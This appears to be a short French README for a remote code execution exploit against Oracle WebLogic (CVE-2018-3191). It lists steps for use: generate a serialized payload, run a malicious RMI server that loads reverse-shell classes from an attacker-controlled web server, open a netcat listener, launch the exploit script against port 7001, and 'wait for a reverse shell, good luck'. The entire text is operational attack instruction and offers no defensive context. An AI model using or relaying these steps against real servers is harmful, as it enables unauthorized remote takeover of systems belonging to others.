CVE-2018-3191-Rce-Exploit
Auteur : Break
Étape 1 : java -jar GenPayload.java output SJpayload.bin, l'adresse est l'adresse du serveur RMI
Étape 2 : java -jar RMISERVER.jar httpaddress, le serveur RMI écoute sur le port 1099 et charge les classes reverse distantes sur le serveur web
Étape 3 : mettre deux fichiers (reverse shell) LoadObject.class et StreamConnection.class sur le serveur http et qu'ils soient accessibles par url
Étape 4 : nc -llp 2222
Étape 5 : python weblogic.py weblogicAddress 7001 SJpayload
Étape 6 : attendre un reverse shell, bonne chance